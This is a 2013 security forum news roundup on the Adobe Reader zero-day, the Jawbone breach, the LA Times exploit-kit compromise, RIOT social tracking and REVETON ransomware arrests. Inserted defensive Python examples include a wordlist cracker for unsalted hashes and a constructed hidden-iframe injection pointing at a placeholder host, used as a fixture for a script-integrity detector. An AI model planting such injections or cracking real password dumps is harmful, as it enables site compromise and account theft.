Spyware, viruses, & security forum: NEWS - February 13, 2013

"Adobe says it's investigating reports attacks are able to pierce a key defense."

A previously undocumented flaw in the latest version of Adobe Systems' ubiquitous Reader application is being exploited in online hacks that allow attackers to surreptitiously install malware on end-user computers, a security firm said.

"Upon successful exploitation, it will drop two DLLs," FireEye researchers Yichong Lin, Thoufique Haq, and James Bennett wrote of the online attacks they witnessed. "The first DLL shows a fake error message and opens a decoy PDF document, which is usually common in targeted attacks. The second DLL in turn drops the callback component, which talks to a remote domain." DLL is shorthand for a file that works with the Microsoft Windows dynamic link library.

Jawbone, makers of Bluetooth headsets, fitness bracelets, and neat Jambox portable speakers, has warned that hackers managed to break into its systems, and accessed the names, email addresses and encrypted passwords of users.

In an email sent to affected users, Jawbone explained that the hack affected an unspecified number of customers who had registered a MyTALK account (used to customise devices and receive firmware updates). [Screenshot]

Jawbone said it had disabled the MyTALK passwords of affected customers, and was keen to emphasise that it did not have any evidence that the hackers had abused the stolen information:

"...we do not believe there has been any unauthorized use of login information or unauthorized access to information in your account."

What remains a mystery, however, is how many Jawbone customers were impacted and just how Jawbone stored the encrypted passwords. For instance, there's no indication that the hashed passwords were salted to introduce a random factor that would make them significantly harder to crack.
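The Jawbone item above points out that a hashed password without a salt is much easier to crack. As an added illustration (not part of the original post and not Jawbone's code), the following Python contrasts unsalted SHA-256 storage with per-user salted PBKDF2 storage. The user names, passwords and the small wordlist are constructed placeholders.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the table an attacker precomputes once
# and reuses against every unsalted hash dump (placeholder values).
WORDLIST = ["password", "letmein", "sunshine1", "correct horse battery"]


def unsalted_hash(password: str) -> str:
    """Plain SHA-256: the same password always yields the same digest."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password: str, salt: bytes, iterations: int = 100_000) -> str:
    """PBKDF2-HMAC-SHA256 with a per-user random salt.

    Stored as 'salt$iterations$digest' so verification can recover both.
    """
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def verify_salted(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt; constant-time comparison."""
    salt_hex, iterations, digest = stored.split("$")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), digest)


def build_lookup_table(wordlist):
    """Precompute digest -> password once; only useful when no salt is used."""
    return {unsalted_hash(word): word for word in wordlist}


def crack_with_table(stored_digests, table):
    """Return (digest, password) for every stored digest the table resolves."""
    return [(d, table[d]) for d in stored_digests if d in table]


def demo():
    """Contrast the two storage schemes on a constructed set of users."""
    users = {"alice": "letmein", "bob": "letmein", "carol": "sunshine1"}
    table = build_lookup_table(WORDLIST)

    # Unsalted: identical passwords collide, and one table cracks the whole dump.
    unsalted = {u: unsalted_hash(p) for u, p in users.items()}
    cracked = crack_with_table(unsalted.values(), table)

    # Salted: each user gets 16 random bytes, so digests differ even for
    # identical passwords and the precomputed table matches nothing.
    salted = {u: salted_hash(p, os.urandom(16)) for u, p in users.items()}
    salted_digests = [s.split("$")[2] for s in salted.values()]

    return {
        "unsalted_collide": unsalted["alice"] == unsalted["bob"],
        "unsalted_cracked": len(cracked),
        "salted_collide": salted["alice"] == salted["bob"],
        "salted_cracked": len(crack_with_table(salted_digests, table)),
        "verify_ok": verify_salted("letmein", salted["alice"]),
        "verify_wrong": verify_salted("password", salted["alice"]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With a salt, an attacker who obtains the dump has to redo the wordlist work once per user rather than once for the whole table, and the iteration count multiplies the cost of each guess.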

US President Barack Obama has signed an executive order requiring federal agencies to share cyberthreat information with private companies and to create a cybersecurity framework focused on reducing risks to companies providing critical infrastructure.

The cybersecurity framework would be voluntary for some operators of critical infrastructure, but the order also requires federal agencies overseeing critical infrastructure to identify the operators and industries most at risk and to explore whether the government can require those companies to adopt the framework.

The agencies will focus on critical infrastructure "where a cybersecurity incident could reasonably result in a catastrophic regional or national effect on public health or safety, economic security, or national security," said the order, signed by Obama just before his State of the Union speech Tuesday evening.

In a company video obtained and posted online by The London Guardian on Sunday, Mr. Urch shows how repeated "check-ins" or postings on social media sites leave a trail of location data that enables RIOT to build up a detailed daily itinerary for the people it is tracking.

He demonstrates by tracking a Raytheon employee called Nick. When he inputs Nick's email address, the program responds with a list of social media sites Nick uses. With a few clicks, Mr. Urch is able to compile location data from photographs and other postings Nick has shared on social media, including FourSquare — a location-based service for FaceBook users that helps online friends know when they are near each other.

The Los Angeles Times has scrubbed its Web site of malicious code that served browser exploits and malware to potentially hundreds of thousands of readers over the past six weeks.

On Feb. 7, KrebsOnSecurity heard from two different readers that a subdomain of the LA Times' news site (offersanddeals.latimes.com) was silently redirecting visitors to a third-party Web site retrofitted with the Blackhole exploit kit. I promptly asked my followers on Twitter if they had seen any indications that the site was compromised, and in short order heard from Jindrich Kubec, director of threat intelligence at Czech security firm Avast.

Kubec checked Avast's telemetry with its user base, and discovered that the very same LA Times subdomain was indeed redirecting visitors to a Blackhole exploit kit, and that the data showed this had been going on since at least December 23, 2012.

Contacted via email, LA Times spokeswoman Hillary Manning initially said a small number of users trying to access a subdomain of the site were instead served a malicious script warning on Feb. 2 and 3. But Manning said this was the result of a glitch in Google's display ad exchange, not a malware attack on the company's site.

The report details mobile, social, email and web-based threats, and while it is full of ominous data points, it is a very interesting read. The report is designed to help security professionals keep current with threat trends and improve the effectiveness of existing security solutions. It can also be used to identify and prioritize security gaps that may require new approaches and more innovative strategies.

Creating the report began with the ThreatSeeker Network, composed of big data clusters used by the WSL to collect and manage up to 5 billion inputs each day from 900 million global endpoints. Malware samples, mobile applications, email content, web links and other information were then passed through deep analysis processes including our Advanced Classification Engine (ACE), which applied over 10,000 different analytics.

Here is a sampling of key findings from this year's report:

1. Web Security. The web became significantly more malicious in 2012, both as an attack vector and as the primary support element of attacks originating through social media, mobile devices, and email. Researchers measured an alarming 600 percent increase in the use of malicious web links through all vectors.

2. The Social Web. Malicious content was hidden within social media behind shortened web links 32 percent of the time. Social media attacks took advantage of the confusion of new features, changing services and unsophisticated users.

3. Mobile Security. A study of last year's malicious apps revealed how they often abuse permissions; especially in the use of SMS communications, something very few legitimate apps do. Risks also increased as mobile devices were used for social media and web surfing more often than actually making a phone call.

As recently mentioned in the Sophos Security Threat Report, 80% of the websites where we detect malicious content are innocent sites that have been hacked.

A trend that we have observed is that hackers will insert their malicious code into legitimate JavaScript (not to be mixed up with Java!) hosted on the website.

The JavaScript is automatically loaded by the HTML webpages and inherits the reputation of the main site and the legitimate JavaScript.

In other words, if a user's anti-virus software did display an alert about malicious content, it might be shrugged off as a false positive and blamed on an unreliable detection of a legitimate piece of JavaScript code.

Recently SophosLabs has seen a flurry of detections of Troj/Iframe-JG on legitimate websites, including:
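The Sophos item above describes attackers appending their own code to a site's legitimate JavaScript so that it inherits the site's reputation. As an added illustration from the site operator's side (not part of the original post and not SophosLabs' code), the following Python keeps a hash baseline of the hosted script files, flags any file that no longer matches, and inspects changed files for a script-written hidden iframe pointing at an outside host. The two script files, the injected line, the `example.invalid` host and the `SITE_HOST` value are all constructed placeholders.

```python
import hashlib
import re

# Constructed stand-ins for two scripts a site hosts, as recorded when they
# were deployed (placeholder content, not real library code).
BASELINE_FILES = {
    "js/jquery.min.js": (
        "/*! constructed stub of a minified library */\n"
        "function $(s){return document.querySelector(s);}\n"
    ),
    "js/site.js": (
        "document.addEventListener('DOMContentLoaded',"
        "function(){$('#menu').className='ready';});\n"
    ),
}

# What a later scan fetches: site.js is untouched, but the library file has a
# hidden-iframe writer appended (constructed; example.invalid is a placeholder).
CURRENT_FILES = {
    "js/jquery.min.js": BASELINE_FILES["js/jquery.min.js"]
    + "document.write('<iframe src=\"http://example.invalid/in.php\" "
    "width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>');\n",
    "js/site.js": BASELINE_FILES["js/site.js"],
}

SITE_HOST = "www.example-site.invalid"  # placeholder: the site's own host

# document.write of an <iframe> that is 0/1 px or hidden via CSS.
HIDDEN_IFRAME = re.compile(
    r"""document\.write\(\s*['"]<iframe.*?"""
    r"""(?:(?:width|height)=["']?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none)""",
    re.I,
)
# Host part of any <iframe src="http(s)://host/..."> in a line.
IFRAME_SRC_HOST = re.compile(r"""<iframe[^>]*?src=["']https?://([^/"'\s]+)""", re.I)


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def build_baseline(files):
    """Record path -> SHA-256 at deploy time, the reference for later scans."""
    return {path: sha256_hex(content) for path, content in files.items()}


def find_modified(baseline, current):
    """Paths whose current hash differs from baseline, or that are missing."""
    return sorted(
        path for path, digest in baseline.items()
        if current.get(path) is None or sha256_hex(current[path]) != digest
    )


def content_findings(content, site_host):
    """Line-level indicators of an injected iframe inside a script file."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), 1):
        if HIDDEN_IFRAME.search(line):
            findings.append(f"line {lineno}: hidden iframe written by script")
        for host in IFRAME_SRC_HOST.findall(line):
            if host.lower() != site_host.lower():
                findings.append(f"line {lineno}: iframe to external host {host}")
    return findings


def audit(baseline, current, site_host):
    """Integrity check first; content inspection only for files that changed."""
    modified = set(find_modified(baseline, current))
    report = {}
    for path in baseline:
        content = current.get(path, "")
        report[path] = {
            "modified": path in modified,
            "findings": content_findings(content, site_host) if path in modified else [],
        }
    return report


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_FILES)
    for path, result in audit(baseline, CURRENT_FILES, SITE_HOST).items():
        status = "MODIFIED" if result["modified"] else "ok"
        print(f"{path}: {status}")
        for finding in result["findings"]:
            print(f"  {finding}")
```

The hash comparison is the reliable part: any change to a deployed script, obfuscated or not, shows up as a mismatch, which is why it runs first. The pattern checks only explain what changed and will miss injections that do not use an iframe, so they are a triage aid rather than the detection itself.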

A glitch in the Flickr matrix has resulted in intimate photos of a number of its users being made available for everyone to see after their permissions turned from "private" to "public" without their knowledge, reports The Verge.

The photos were accessible to the public for 20 days, and it was impossible to change the setting back to "private" during this period. The only silver lining in this incident is that these photos were not included in Flickr's own search engine or any of the outside ones.

Affected users took to the official help forum to express their dissatisfaction and anger, especially after Flickr attempted to do some damage control by setting all public photos to private.

"It has utterly decimated my food blogging site which is a huge source of revenue for me," wrote a FlickrPro user. "Not only do I have to go back and change all the permissions, BUT changing the permissions changes the code, which means I have to go through each post and re-apply all my pictures. This is HUNDREDS of pictures. I am utterly disgusted and shaking I am so angry."

Ransomware is a nasty scam that infiltrates your computer and tricks you into thinking that you've done something wrong. Police ransomware in particular informs users that they need to pay their local police a fine. [Screenshot: Ransomware Warning Screen]

We have written detailed reports about these attacks in the past, including multiple blog posts as part of our investigations into this ongoing threat. [Screenshot]

Trend Micro threat researchers have been studying this scam throughout 2012 and have collaborated very closely with law enforcement authorities in several European countries, especially in Spain. Today, we are very happy to report that the Spanish Police has put the information to good use, and they have just announced in a press conference the arrest of one of the head members of the cybercriminal gang that produces the Ransomware strain known as REVETON.

The apparent arrest of this cybercriminal of Russian origin occurred in Dubai, United Arab Emirates. The law enforcement authorities are working to extradite him to Spain for prosecution. Along with his arrest, the operation included the arrests of 10 other individuals tied to the money laundering component of the gang's operations, which managed the monetization of the PaySafeCard/UKash vouchers received as payment in the scam. The gang apparently had a branch in Spain that exchanged these vouchers and converted them into actual money, which would then be transferred to the leaders of the gang in Russia.
